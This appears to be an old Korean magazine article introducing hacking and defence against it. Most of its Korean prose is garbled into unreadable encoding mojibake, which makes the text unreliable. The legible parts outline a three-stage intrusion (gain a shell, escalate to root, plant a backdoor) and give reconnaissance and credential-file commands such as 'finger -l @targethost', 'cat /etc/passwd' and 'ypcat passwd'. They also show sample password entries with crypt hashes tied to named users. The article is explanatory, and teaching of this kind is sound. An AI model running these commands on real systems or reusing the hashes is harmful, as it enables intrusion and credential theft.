ÇØÅ· ¹ý

  
    ÇØÅ· ±âº» °³³ä Àâ±â
    °ú°ÅÀÇ ÇØÅ· »ç·Ê
    ÃÖ±ÙÀÇ ÇØÅ· À¯Çü°ú ¹æÁöÃ¥
    -½º´ÏÇΰú IP ½ºÇªÇÎ
    º¸¾È °ü·Ã FAQ
    
    ´ÙÀ½È£
    
    À¯¿ëÇÑ ½ÃÅ¥¸®Æ¼ üũ Åø
    º¸¾È°ü·Ã ´Üü ¼Ò°³
    
    ÀÎÅͳÝÀÇ °³¹æ¼º°ú Á¤º¸°øÀ¯ ¹× ±³È¯ÀÇ ¿ëÀ̼ºÀ¸·Î ÀÎÇØ ÀÎÅͳݻçÀÇ ÇØÅ·»ç°ÇÀº ³¯·Î ±× ºóµµ¼ö°¡ ³ô¾Æ°¡¸ç ±× À¯Çü ¶ÇÇÑ °í µµÈ­ÇÏ°í ±×·Î
    ÀÎÇÑ ÇÇÇØÀÇ ½É°¢¼ºÀº ÇÏ·ç°¡ ´Ù¸£°Ô º¯¸ðÇÏ°í ÀÖ´Ù. ƯÁýII¿¡¼­´Â 5¿ùÈ£¿Í 6¿ùÈ£ µÎ´Þ¿¡ °ÉÃÄ ÇØÅ·¹æÁö Å×Å©´ÐÀ» ±âȹÇß´Ù. À̸¦ ÅëÇØ
    ÇØÅ·ÆÐÅÏÀÇ º¯È­¸¦ »ìÆ캸°í, ÃÖ±Ù¿¡ ÀϾ°í ÀÖ´Â ±¸Ã¼ÀûÀÎ ÇØÄ¿ ħÀÔ°æ·Î¿Í ÇüÅÂ, ±×¸®°í ±×¿¡ ´ëÇÑ ¹æ ÁöÃ¥À» ÀÚ¼¼È÷ µé¿©´Ùº¸±â·Î ÇÑ´Ù.
    Ãʺ¸ÀÚµéÀÇ ÀÌÇظ¦ µ½±â À§ÇØ ÇØÅ·°ú º¸¾È¿¡ °ü·ÃÇÑ °³°ýÀûÀÎ ³»¿ëÀº ¿ù°£ Internet 95³â 7¿ù È£ºÎÅÍ 11¿ùÈ£¸¦ ÂüÁ¶Çϱ⠹ٶõ´Ù.
    
    ³ëÁ¤¼® ±èÈÖ°­ Á¶¿ë»ó ÃÖÀçö / KUS ȸ¿ø
    
    ÇØÅ·ÀÇ ±âº» °ñ°ÝÀ» ÀâÀÚ!
    Àü»êÇаúÀÎ K±ºÀº Çаú ¼ºÀûÀÌ ¾ÆÁÖ ÁÁÁö ¸øÇÏ´Ù. ÇÏ Áö¸¸ ½Ç·Â¸¸Àº ´©±¸º¸´Ùµµ ÀÖ´Ù°í ÀںνÉÀ» °¡Áö°í ÀÖ´Ù. ÇÏÁö¸¸ ¼ºÀûÀÌ ³ª»Ú´Ù´Â
    ÀÌÀ¯¸¸À¸·Î ¾Æ¹«µµ ÀÎÁ¤À» ÇØÁÖÁö ¾ÊÀÚ ÀڱⰡ ÀÎÁ¤¹ÞÀ» ¼ö ÀÖ´Â °÷Àº °¡»ó¼¼°è»ÓÀ̶ó°í »ý°¢

ÇÏ°Ô µÆ´Ù. ±× µÚ·Î K±ºÀÌ ¿­À» ¿Ã¸®°Ô µÈ °ÍÀº
    ÇØÅ·À̾ú´Ù. K±ºÀº ½É½ÉÇÏ°í ¹«·á ÇÔÀ» ´Þ·¡±â À§ÇØ ´ëÇüÅë½Å¸Á¿¡¼­ äÆÃÀ» Áñ±â°í ÀÖ´Ù.
    
    Ã¶ÀúÇÏ°Ô À§ÀåÇØ ÀÚ½ÅÀÇ ½ÅºÐÀ» °¨Ãáä R¾ç°ú äÆÃÀ» Áñ±â°í ÀÖ´Ù. R¾çÀÇ ÁÖ¼Ò¿Í ºñ¹Ð¹øÈ£ µîÀ» Á¶»çÇØ ±×³à¸¦ ³î¶ó°Ô Çϸç Áñ °Å¿ò¿¡
    ºüÁø´Ù. R¾çÀÇ Áֹεî·Ï¹øÈ£¸¦ ¾Ë¾Æ³» ÀºÇà°øµ¿¸Á¿¡¼­ ±×³àÀÇ °èÁ¸¦ ÃßÀû, ÀڽŰú äÆÃÇÑ '´ë°¡'·Î µ·À» ÀÚ½ÅÀÇ ±¸Á·ΠÀÌüÇÑ´Ù.
    
    ¾Æ, ±×·¡µµ ½É½ÉÇÏ´Ù. ¸ð ´ëÇп¡ µé¾î°¡ ÇлýµéÀÇ ¼ºÀûÀ» ¿­¶÷ÇÑ´Ù. °íµîÇб³¶§ ºÎÅÍ ²Ãº¸±â ½È´ø ³ðÀÌ ÀÖ¾ú´Ù. ±× ³à¼®ÀÇ ¼º ÀûÀ» ¸ðµÎ
    F·Î ¸¸µé¾î¹ö¸°´Ù. ¼ÓÀÌ Á» ÈÄ·ÃÇÏ´Ù. ¾Æ.. ½É½ÉÇØ. ´õ ¹»ÇÒ±î...
    
    À§ÀÇ ³»¿ëÀº ¾î¶² ÇлýÀÌ Å»¼±ÀÇ ±æ·Î ºüÁø °ÍÀ» °¡»óÀ¸·Î ²Ù¸çº» ±ÛÀÌ´Ù. ÃÖ±Ùµé¾î ÇØÅ·À̶õ ´Ü¾î¸¦ »ç¶÷µéÀÌ ¸¹ÀÌ Á¢ÇÏ°í´Â ÀÖÁö¸¸ Á¤È®È÷
    ¾î¶°ÇÑ ¶æÀ» °®°í ÀÖ°í ÇØÅ·¿¡´Â ¹«¾ùÀÌ ÀÖ´ÂÁö Á¤È®È÷ ¾Æ´Â »ç¶÷µéÀº ±×·¸°Ô ¸¹Áö ¾Ê´Ù. ¿ÀÈ÷·Á ¾ð·ÐÀÇ ÇØ Å·¿¡ ´ëÇÑ ¿Àº¸ ¶§¹®¿¡ ÀÎÅͳݿ¡
    ´ëÇÑ À߸øµÈ ¼±ÀÔ°üÀ» °®°Ô ÇÏ´Â ¼öµµ ÀÖ´Â °ÍÀÌ´Ù.
    
    À§ÀÇ °¡»óÀÇ ±Û¿¡¼­ º¸ÀÎ ¿¹´Â ÇØÄ¿¿¡ ´ëÇÑ À߸øµÈ ÀνÄÀÌ ´ã°ÜÀÖ´Ù. ±×·¸´Ù¸é ÇØÅ·À̶õ ¹«¾ùÀΰ¡? ÁøºÎÇÑ ¸éÀÌ ÀÖ±ä ÇÏÁö¸¸ hacker's
    dictionay¸¦ ÂüÁ¶Çϱâ·Î ÇÏÀÚ.
    
    
        Hacker: 1. A person who enjoys learning the details of computer systems

        and how to stretch their capabilities - as opposed to most users of
        computers, who prefer to learn only the minimum amount necessary.
        
        2.One who programs enthusiastically or who enjoys programming rather
        than just theorizing about programming.
        
        - Guy L.Steele. et al. The Hacker's Dictionary
        
        
    ÇØÄ¿¶õ, ÄÄÇ»ÅÍ¿¡ Á¤¿­À» °¡Áö°í ¿­½ÉÈ÷ ¸ôµÎÇÏ´Â »ç¶÷µéÀ» ¶æÇÑ´Ù. ¿ÀÈ÷·Á ¾ð·Ð¿¡¼­³ª Àϻ󿡼­ ¶°µ¹°í ÀÖ´Â ÇØÄ¿¶ó´Â ´Ü¾î´Â
    Å©·¡Ä¿(Cracker)³ª ½Ã½ºÅÛħÀÔÀÚ(system intruder)ÀÇ ¶æ¿¡ ´õ °¡±õ´Ù°í ÇÒ ¼ö ÀÖ´Ù.
    
    ÃÖ±Ù¿¡´Â °¢Á¾ ¾ð·ÐÀ̳ª ±â°ü¿¡¼­ ÇØÅ·¿¡ »ó´çÈ÷ ¹Î°¨ÇÑ ¹ÝÀÀÀ» º¸ÀÌ°í ÀÖ´Â °ÍÀÌ ¿äÁò µé¾î »ó´çÈ÷ Å©°í ÀÛÀº ÇØÅ· »ç°ÇµéÀÌ ÀÚÁÖ ÀϾ±â
    ¶§¹®ÀÌ´Ù. ÀÎÅͳÝÀÌ È®»êµÊ¿¡ µû¶ó ÀÌ·¯ÇÑ Çö»óÀº ´õ¿í µÎµå·¯Áú °ÍÀ¸·Î º¸ÀδÙ.
    
    ÇØÅ·¿¡ ´ëºñÇÑ °¡Àå ¹«¼­¿î ¹æ¾î¹ýÀº ¹é¾÷ÀÌ ¾Æ´Ò±î ½Í´Ù. ÀÌ´Â ¹°·Ð °¡Àå ±âº»ÀûÀÎ ´ëºñÃ¥À̱⵵ ÇÏ´Ù. "Çϵåµð½ºÅ©¸¦ ¹Ð ¾î¹ö¸®·Á¸é
    ¹Ð¾îºÁ¶ó. ¿ì¸®´Â ³¯¸¶´Ù ¹é¾÷ ¹Þ´Â´Ù³×" "¾îÁ¦ Áö¿ì°í °¬À¸¸é ¿À´Ã ¶Ç »ì·Á³õÀ¸¸é µÇÁö ¹¹." ÀÌ·¸°Ô µÈ´Ù¸é ÇØÅ·ÇÒ ¸ÀÀÌ ³¯±î?

ÇØÅ·
    ¹æÁö¹ýÀ» ÀÍÈ÷±â¿¡ ¾Õ¼­ °£´ÜÈ÷ ±¹³»¿¡¼­ ÀϾ¾ú´ø ÇØÅ· »ç·ÊµéÀ» »ìÆ캸°í ÀÌÀüÀÇ ÇØÅ·À¯Çü °ú ÃֽŠÇØÅ· »ç·ÊµéÀ» ÀÚ¼¼È÷ »ìÆ캻´Ù.
    
    ±¹³»¿¡¼­ ¹ß»ýÇÑ ÇØÅ· »ç·Ê
    
    
        SERI(½Ã½ºÅÛ °øÇÐ ¿¬±¸¼Ò)ÀÇ ½´ÆÛÄÄ ¼¾Åͳ» CRAY 2S¿¡ ÇØÄ¿°¡ ħÀÔ, ½Ã½ºÅÛÀ» ±³¶õÇÑ ¿¹. (1992)
        
        ¼­¿ï´ëÇб³ Àü»ê¼¾ÅÍ¿¡ ÇØÄ¿µéÀÌ ¼­¿ï´ëÀÇ LAN¿¡ ħÀÔÇØ ¿öÅ©½ºÅ×ÀÌ¼Ç 6´ëÀÇ ¸ðµç Çϵåµð½ºÅ©¸¦ Áö¿ö¹ö¸° ¿¹. (1993)
        
        Çѱ¹Åë½Å¿¬±¸°³¹ß¼¾ÅÍ, Çϳª¸Á °ü¸®¼¾ÅÍ¿¡¼­µµ ¼­¿ï´ë¿Í À¯»çÇÑ »ç°ÇÀÌ ¹ß»ý (1993)
        
        ¿øÀÚ·Â ¿¬±¸¼Ò¿¡ ¿µ±¹ ¼Ò³âÇØÄ¿°¡ ħÀÔ(»ç½ÇÀº ÀÌ¿Í À̸§ÀÌ ºñ½ÁÇÑ ´ëÇÐÀÇ È£½ºÆ®¿¡ ħÀÔÇÑ °ÍÀÌÁö¸¸ ¾ð·ÐµéÀÇ ÇãÀ§,°úÀ庸µµ·Î À߸ø
        ¾Ë·ÁÁø »ç°Ç)ÇØ ÇÏµå µð½ºÅ©ÀÇ Á¤º¸°¡ ¿ÜºÎ¿¡ °³¹æµÆ´ø »ç°Ç (1994)
        
        Çѱ¹ Àü»ê¿ø, KRNIC(Çѱ¹ ¸ÁÁ¤º¸¼¾ÅÍ) ÇØÅ·»ç°Ç:±¹³» ³×Æ®¿öÅ© Á¤º¸¼­¹ö¿¡ ÇØÄ¿°¡ ħÀÔÇÑ »ç°Ç (1994)
        
        ¼­°­´ëÇб³ÀÇ ¾ÆÅ°¼­¹ö¿¡ ħÅõÇØ µð½ºÅ©¸¦ Áö¿ö¹ö¸° »ç°Ç (1994)
        
        KAIST ÇØÅ· »ç°Ç:¿µ¾î±ÇÀÇ ÇØÄ¿°¡ ħÅõÁß KUS(KAIST Unix Security task force)¸â¹ö¿¡ °Ô Àû¹ßµÈ ¿¹
    À§ÀÇ »ç°ÇµéÀº ½Å¹®Áö»ó¿¡¼­ ¸¹ÀÌ Á¢Çغ» °ÍµéÀÌ´Ù. ¹°·Ð Å©°í ÀÛÀº ÇØÅ· »ç°Ç

ÀÌ ¹«¼öÈ÷ ¸¹ÀÌ ÀϾ¾úÁö¸¸ ±½Á÷ÇÑ »ç°Çµé¸¸ ³ª¿­Çß´Ù.ÀÌ¿Í
    °°ÀÌ ¸¹Àº º¸¾È »ç°ÇÀÌ ¹ú¾îÁö´Â »óȲ¿¡¼­ ½Ã½ºÅÛÀÇ °ü¸®ÀÚ³ª »ç¿ëÀÚÀÇ ÀÔÀå¿¡¼­ ¹«¾ùÀ» Çؾ߸¸ÀÌ ÇØÄ¿µéÀÇ Ä§ÀÔ À» ¸·À» ¼ö ÀÖÀ»±î? ¶ÇÇÑ
    µ¶µµ´Â ÀڱⶥÀ̶ó°í ¿ì°Ü´ë´Â ¾â¹Ì¿î ÀϺ»ÀÇ Àü»ê¸ÁÀ» ¹«·ÂÈ­½ÃÅ°·Á¸é ¾î¶² ÀÛ¾÷À» ÇØ¾ß ÇÒ°¡? ÇÏÁö¸¸ µ¶ÀÚµéÀÌ ¿ì¼± ÀÌÇØÇϱ⠽±µµ·Ï ±âÃÊÀûÀÎ
    ³»¿ëÀ» ¸ÕÀú Àû¾î ³õÀ»±î ÇÑ´Ù.
    
    
    ÇØÅ·ÀÇ °³³ä°ú Á¾·ù
    
    ´ëºÎºÐÀÇ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀº ´Ù¸¥ ½Ã½ºÅÛ¿¡ ħÅõ¸¦ ÇÏ´õ¶óµµ ´ëÀǸíºÐ(?)ÀÌ ÀÖ´Â °æ¿ì°¡ ´Ù¹Ý»ç´Ù. ÀڱⰡ °ü¸®ÇÏ´Â ½Ã½ºÅÛ¿¡ ´Ù¸¥ ÇØÄ¿°¡
    µé¾î¿Í¼­, À̸¦ ½Å¼ÓÈ÷ ÃßÀûÇϱâ À§ÇØ ¿ªÇØÅ·ÇÏ´Â °æ¿ìÀÇ ¿¹¸¦ µé ¼ö ÀÖ°Ú´Ù. ¶ÇÇÑ ¾î´À Á¤µµ ½Ç·ÂÀÖ´Â ÇØÄ¿µéÀÇ °æ ¿ì¿¡´Â ÇØÄ¿¸®Áò¿¡ °üÇÑ
    °ÇÀüÇÑ ¸¶Àε尡 Çü¼ºµÅ ÀÖ´Â »ç¶÷µéÀÌ ¸¹±â ¶§¹®¿¡ À̵éÀÌ È¤½Ã Àڱ⠽ýºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷Áö ¾ÊÀ»±î °ÆÁ¤ÇÒ ÇÊ¿ä´Â ¾ø´Ù.
    
    ´Ù¸¸ °ÆÁ¤ÀÌ µÇ´Â °ÍÀº Áß°í»ýµéÀÌ ÄÄÇ»Åͳª À¯´Ð½º¿¡ °üÇÑ Àü¹®ÀûÀÎ Áö½Äµµ ¾øÀ¸¸é¼­ ¸·¿¬ÇÑ °ø¸í½É°ú ¾û¶×ÇÑ ¿µ¿õ½É¿¡ ÈÛ¾µ·Á ÇØÅ·À» ÇÏ°Ô
    µÇ´Â °æ¿ìÀÌ´Ù. À̵éÀº ¾î¼´Ù ±¸ÇÑ ÇØÅ·ÅøÀ» ÀÌ¿ëÇØ, ÇØÅ·À» Çϸç ÀڽŵéÀÌ Ä§Åõ¸¦ Çß´Ù´Â Áõ°Åµµ Áö¿ì°í ³ª°¡Áö ¸øÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù.
    ÀÌ·¯ÇÑ »óȲ¿¡¼­ Áß°í»ýµéÀÌ ¿ì¿¬È÷ ħÅõÇÏ°Ô µÇ¾ú´Ù°¡ ÀâÈ÷°Ô µÇ¸é ±×µéÀÇ Àλý¿¡´Â ¾î´Àµ¡ Àü°úÀÚ ¶ó´Â ±â·ÏÀÌ ³²°Ô µÇ´Â °ÍÀÌ´Ù.¤Ô
    
    ÇØÅ·À̶õ ¹ý·üÀûÀÎ Àǹ̿¡¼­ º¸¸é '½Ã½ºÅÛÀÇ °ü¸®ÀÚ°¡ ±¸ÃàÇØ ³õÀº º¸¾È¸ÁÀ» ¾î¶² ¸ñÀû¿¡¼­°Ç ¹«·ÂÈ­½ÃÄ×À» °æ¿ì ÀÌ¿¡

µû¸¥ ¸ð µç ÇൿÀ»
    ÇØÅ·À̶ó°í ÇÑ´Ù.'°í µÅÀÖ´Ù. ÇÏÁö¸¸ ³×ƼÁ𰣿¡´Â º¸Åë ½Ã½ºÅÛ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÑ °æ¿ì, ¶Ç À̸¦ ¾Ç ¿ëÇØ ´Ù¸¥ »ç¿ëÀÚ¿¡°Ô
    ÇÇÇظ¦ ÁØ °æ¿ì¸¦ ÇØÅ·À̶ó°í Á¤ÀÇÇÏ°í ÀÖ´Ù. (°£´ÜÇÑ ÇØÅ·À¸·Î ¾î¶² »ç¿ëÀÚÀÇ Æнº¿öµå¸¦ ÃßÃøÀ» ÅëÇؼ­ °Ç, ¿ì¿¬È÷ ¾Ë°Ô µÇ¾î¼­°Ç µµ¿ëÀ»
    ÇÏ°Ô µÆÀ» °æ¿ì¸¦ µé ¼ö ÀÖ´Ù.)
    
    
    ÇØÅ·ÀÇ 3´Ü°è ÀýÂ÷
    
    ¾î¶² È£½ºÆ®¸¦ ÇØÅ·Çϱâ À§Çؼ­´Â º¸Åë 3´Ü°è ÀýÂ÷¸¦ °ÅÄ¡°Ô µÈ´Ù. 1´Ü°è·Î ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇÏ¿© ½©(shell)À» »ç¿ëÇÒ
    ¼ö ÀÖ´Â À¯ÀúÀÇ ±ÇÇÑÀ» ¾ò¾î ³»´Â °ÍÀÌ´Ù. À̸¦ ½ÇÇàÇϱâ À§ÇØ À¯ÀúÀÇ Æнº¿öµå¸¦ ¾Ë¾Æ¾ß Çϴµ¥, ½º´ÏÇÁ(sniff)¸¦ ÀÌ¿ë ÇÏ´Â
    °í±Þ¹æ¹ý¿¡¼­ºÎÅÍ, finger -l @targethost¸¦ ÇØ ¾Ë¾Æ³½ »ç¿ëÀÚµéÀÇ Æнº¿öµå¸¦ ÃßÃøÇØ ·Î±äÇÏ´Â ¹«½ÄÇÑ ¹æ¹ý±îÁö ¾ÆÁÖ ´Ù¾ç ÇÑ
    ¹æ¹ýÀÌ ÀÖ´Ù.
    
    º¸ÅëÀÇ ÇØÄ¿¶ó¸é ¿ÜºÎ¿¡¼­ ¸ñÇ¥·Î ÇÑ È£½ºÆ®ÀÇ Æнº¿öµå ÆÄÀÏÀ» »©¿Í¼­ À̸¦ ÀÌ¿ëÇØ ¸ñÇ¥·Î ÇÑ È£½ºÆ® ³»ºÎÀ¯Àú·Î ħÀÔÇÏ´Â °Í ÀÌ º¸ÅëÀÌ´Ù.
    ±×¸®°í ÀÌ 1´Ü°è¸¦ ¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ³×Æ®¿öÅ© ½ÃÅ¥¸®Æ¼ÀÌ´Ù.
    
    2´Ü°è·Î ¸ñÇ¥·Î Çß´ø È£½ºÆ® ³»ºÎ¿¡ ÀâÀÔÀ» ÇßÀ¸¸é ¸ñÇ¥ È£½ºÆ®ÀÇ °ü¸®ÀÚ(root)ÀÇ ±ÇÇÑÀ» ȹµæÇÏ·Á°í ½ÃµµÇÒ °ÍÀÌ´Ù. À̴ ȣ½º Æ®
    ³»ºÎÀÇ OS Ȧ(hole)À» ÀÌ¿ëÇÏ´Â °æ¿ì°¡ ¸¹´Ù. ¶ÇÇÑ ÀÌ 2´Ü°è¸¦ ¹æ¾îÇÏ´Â °ÍÀÌ ¹Ù·Î ·ÎÄà ½ÃÅ¥¸®Æ¼ÀÌ´Ù.
    

    3´Ü°è´Â È£½ºÆ® °ü¸®ÀÚ(root)ÀÇ ±ÇÇÑÀ» ȹµæÇÑµÚ ÀÚ½ÅÀÌ ´ÙÀ½¿¡ ´Ù½Ã ħÀÔÇÒ °æ¿ì¿¡ ÆíÀǼºÀ» ±âÇϱâ À§ÇØ backdoor(µÞ¹®)À» ¸¸
    µé¾î ³õ°í ³ª°¡´Â ´Ü°èÀÌ´Ù. ¸Å¹ø ¸ñÇ¥·Î ÇÑ È£½ºÆ®¿¡ ÀâÀÔÇϱâ À§ÇØ ¹ø¹øÈ÷ ÇØÅ·À» ½ÃµµÇÑ´Ù¸é Áõ°Å¸¦ ¾ðÁ¨°¡ ³²±â±â ¸¶·ÃÀÌ°í '²¿¸®°¡
    ±æ¾îÁ®¼­' °á±¹Àº ÀâÈ÷±â ¸¶·ÃÀÌ´Ù. ÀڽŸ¸ÀÌ »ç¿ëÇÒ ¼ö ÀÖ´Â ³»ºÎ ¹ö±×(Æ®·ÎÀÌ ¸ñ¸¶)¸¦ ³²°Ü³õ°í °¡´Â °ÍÀÌ Ä§ÀÔ¶§ Áõ °Å¸¦ ³²±âÁö ¾Ê´Â
    ÁÁÀº ¹æ¹ýÀ̱⠶§¹®¿¡ ÇØÄ¿µéÀº À̸¦ ¾Ö¿ëÇÏ°í ÀÖ´Ù.
    
    
    ÇØÅ·ÀÇ ÀÌÇظ¦ µ½±âÀ§ÇÑ À¯´Ð½º »óÀÇ ±âÃÊ»ó½Ä
    
    ÀÌÁ¦ºÎÅÍ ³ª¿À´Â ³»¿ëµéÀº ÇØÅ·À» ÀÌÇØÇϱâ À§ÇÑ À¯´Ð½º»óÀÇ ±âÃÊ Áö½ÄÀÌ´Ù.
    
    
    Æнº¿öµå´Â ¾î¶»°Ô °ü¸®µÇ´Â°¡?
    
    º¸Åë µµ¿ëÇÑ ID¸¦ ÀÌ¿ëÇØ ´Ù¸¥ ½Ã½ºÅÛÀ̳ª IDÀÇ ¼ÒÀ¯ÁÖ°¡ »ç¿ëÇÏ°í ÀÖ´Â ½Ã½ºÅÛÀÇ °ü¸®ÀÚ(root, Super user)ÀÇ ÀÚ°ÝÀ»
    ¾ò¾î³»±â À§ÇÑ ¹ßÆÇÀ¸·Î »ï´Â °æ¿ì°¡ ÀÖ´Ù. ±×·¯¹Ç·Î ÀÚ½ÅÀÇ µµ¿ë´çÇÑ ID ¶§¹®¿¡ ÇÇÇظ¦ º» ÂÊ¿¡¼­ Á¶»ç¸¦ ÇÑ´Ù¸é ÀÚ½ÅÀÌ ÇÏÁöµµ ¾ÊÀº ÀÏ
    ¿¡ ÀǽÉÀ» »ç°Ô µÉ ¼öµµ ÀÖ°Ô µÇ´Â °ÍÀÌ´Ù.
    
    ¶ÇÇÑ ID¸¦ µµ¿ë´çÇϸé ÀڽŸ¸ÀÇ ÇÇÇØ·Î ³¡³ª´Â ÀÏÀÌ ¾Æ´Ñ ½Ã½ºÅÛÀÇ ÇÇÇرîÁöµµ ¾ß±âÇÒ ¼ö Àֱ⠶§¹®¿¡ Æнº¿öµå¸¦ °ËÁõÇÏ´Â Àý Â÷¸¦ µÎ¾î
    Æнº¿öµå¸¦ ¸ð¸£´Â ¿ÜºÎÀÎÀº »ç¿ëÇÏÁö ¸øÇϵµ·Ï ¸·°í ÀÖ´Â °ÍÀÌ´Ù.
    
    ÇÏÁö¸¸ ÀÌ Æнº¿öµå¸¦ »ç¿ëÇÏ°í ÀÖ´Ù ÇÏ´õ¶ó

µµ ¹®Á¦´Â ÀÖ´Ù. ¸¸ÀÏ ´Ù¸¥»ç¶÷µµ ÃæºÐÈ÷ ÃßÃøÇس¾ ¼ö ÀÖ´Â °ÍÀ¸·Î Æнº¿öµå¸¦ Á¤Çß ´Ù¸é ´Ù¸¥
    »ç¶÷ÀÌ ¸¶À½¸¸ ¸ÔÀ¸¸é ÀÚ½ÅÀÇ ID¸¦ »ç¿ëÇÒ ¼ö ÀÖÀ¸¹Ç·Î ¹«¿ëÁö¹°ÀÌ µÇ´Â °ÍÀÌ´Ù. ±×·¡¼­ ÀÚ½ÅÀÇ Æнº¿öµå¸¦ °ü¸®ÇÏ´Â °Í¿¡ ´ëÇØ ¸»Çغ¼±î
    ÇÑ´Ù.
    
    À¯´Ð½º ½Ã½ºÅÛÀº °¢ À¯ÀúµéÀÇ Æнº¿öµå ¹× ±âŸ Á¤º¸¸¦ /etc/passwd¿¡ º¸°üÇÏ°íÀÖ´Ù. vi³ª catÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀÏÀ» »ìÆ캸ÀÚ.(
    ´Ü, º¸´Â ¹æ¹ýÀÌ ¾î¶² ½Ã½ºÅÛÀ» ¾²´À³Ä¿¡ µû¶ó ´Ù¸£´Ù. À§ÀÇ °ÍÀº ÀϹÝÀûÀÎ °æ¿ìÀÌ°í À§¿¡ ³ª¿Â NIS ½Ã½ºÅÛÀº NFS ½Ã½ºÅÛ°ú ÇÔ²² °°ÀÌ
    µÚ¿¡¼­ ¼³¸íÇÏ°íÀÚ ÇÑ´Ù.)
    
    
        NIS ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì: cat /etc/passwd³ª ypcat passwd¸¦ ÇÑ´Ù.
        NetInfo ½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ´Â °æ¿ì: nidump passwd / ¸¦ ÇÑ´Ù.
    ¿¹½Ã·Î ¸îÁÙ¸¸ µé¾îº¸ÀÚ.
    
    
        root:##root:0:0:Supervisor:/:/bin/csh
        daemon:##daemon:1:1::/:
        uucp:##uucp:4:8::/var/spool/uucppublic:
        kwlee:##kwlee:104:30:KyeongWon Lee:/circ/kus/kwlee:/usr/local/bin/tcsh
        sakai:##sakai:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh

        hohle:##hohle:11529:410:Hoh eun ha:/under/under/hohle:/bin/csh
        sungho:##sungho:13189:410:Park sung ho :/under/under/sungho:/bin/csh
        
        
    À§¿Í °°ÀÌ : À¸·Î ±¸ºÐµÈ µÎ¹ø° ºÎºÐÀÌ À§¿Í °°ÀÌ µÅÀÖ´Â °æ¿ìµµ ÀÖÀ» °ÍÀÌ°í ¶Ç´Â
    
    
        root:VRLoJ2QnLhRA2:0:0:Supervisor:/:/bin/csh
        daemon:*1:1::/::
        uucp:*:4:8::/var/spool/uucppublic:
        kwlee:ntim9ljaUGI.A:104:30:KyeongWon
        Lee:/circ/kus/kwlee:/usr/local/bin/tcsh
        sakai:tdtwKgRa3ZZoI:129:30:Kim Huy
        kang:/circ/kus/sakai:/usr/local/bin/tcsh
        hohle:u2WKlqINaIP8w:11529:410:Hoh eun ha:/under/under/hohle:/bin/csh
        sungho:eATMm4J0Zb4Dw:13189:410:Park sung ho
        :/under/under/sungho:/bin/csh
        
        
    À§¿Í °°Àº °æ¿ìµµ ÀÖÀ» °ÍÀÌ´Ù. µÎ ÆÄÀÏÀ» Çѹø »ìÆ캸ÀÚ

. ù ¼¼ÁÙÀº root,daemon,uucp¶ó´Â ½Ã½ºÅÛ °èÁ¤(account)¿¡
    °üÇÑ Á¤º¸ ÀÌ°í ±× ´ÙÀ½¿¡ ³ª¿À´Â ÁÙµéÀº kwlee³ª sakai °°Àº ½Ã½ºÅÛÀÇ ÀÏ¹Ý À¯Àúµé¿¡ °üÇÑ Á¤º¸ÀÌ´Ù. °¢°¢ÀÇ ÁÙÀº : À» ±âÁØÀ¸·Î
    ´ÙÀ½°ú °°Àº 7°³ÀÇ Çʵå(field)·Î ³ª´¶´Ù.
    
    
        1 Field : À¯Àú À̸§
        2 Field : À¯ÀúÀÇ Æнº¿öµå(º¸Åë º¸¿©ÁÖÁö ¾Ê°Å³ª ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯Çü½ÃÄÑ ³õ´Â´Ù.)
        3 Field : À¯ÀúÀÇ ID number(UID)
        4 Field : À¯Àú°¡ ¼ÓÇØÀÖ´Â ±×·ìÀÇ ID number(GID)
        5 Field : À¯ÀúÀÇ ½ÇÁ¦ À̸§
        6 Field : À¯ÀúÀÇ È¨ µð·ºÅ丮
        7 Field : À¯Àú°¡ »ç¿ëÇÏ´Â Shell
        
    ±× ¿¹¸¦ µé¾îº¸ÀÚ. À§¿¡¼­ sakai¶õ »ç¶÷À» »ìÆ캸¸é
    
    
        sakai:##sakai:129:30:Kim Huy kang:/circ/kus/sakai:/usr/local/bin/tcsh
        sakai:tdtwKgRa3ZZoI:129:30:Kim Huy
        kang:/circ/kus/sakai:/usr/local/bin/tcsh
        
        
        À¯ÀúÀ̸§: sakai
        password: ##sak

ai(ÀǵµÀûÀ¸·Î Æнº¿öµå ºÎºÐÀ» ¼û±ä °æ¿ì->Shadowing passwd ¶ó°íµµ ¸»ÇÑ´Ù.)
        tdtwKgRa3ZZoI(º¯Çü½ÃÄѼ­ ¾ËÁö ¸øÇÏ°Ô ÇÑ °æ¿ì.º¸Åë encrypt(¾Ïȣȭ)½ÃÄ×´Ù°í ¸»ÇÑ´Ù.)
        UID : 129
        GID : 30
        ½ÇÁ¦ À¯ÀúÀÇ À̸§: Kim Huy kang
        À¯ÀúÀÇ È¨µð·ºÅ丮:/circ/kus/sakai
        À¯Àú°¡ »ç¿ëÇÏ´Â ½©: tcsh
        
    À§¿Í °°Àº Á¤º¸¸¦ ¾òÀ» ¼ö°¡ ÀÖ´Ù.
    
    
    Æнº¿öµå´Â ¾î¶»°Ô ¸¸µé¾îÁö´Â°¡?
    
    ±×·³ À§ÀÇ º¯ÇüµÈ ºÎºÐÀº ¾î¶»°Ô »ý¼ºµÇ´Â °ÍÀϱî? ´ÙÀ½À» ¼öÇà½ÃÄѺ¸ÀÚ.
    
    
        % /usr/lib/makekey iakasbells
        lsDy0cB/5/zho>
        
        % /usr/lib/makekey sakaixvaaa
        aaxuEmMgYNZz2>
        
        
    µÎ¹øÀÇ ½ÇÇà°á°ú¸¦ ºñ±³ÇØ º¸ÀÚ. °øÅëÁ¡Àº ÀÔ·ÂÇÑ ±Û¼èÁß¿¡¼­ ³¡¿¡¼­ µÎ¹ø°ºÎÅÍÀÇ ±Û¾¾´Â ´ÙÀ½ ÁÙÀÇ ¾ÏȣȭµÈ ºÎºÐ¿¡ ±×´ë·Î ÂïÇô ³ª¿À°í
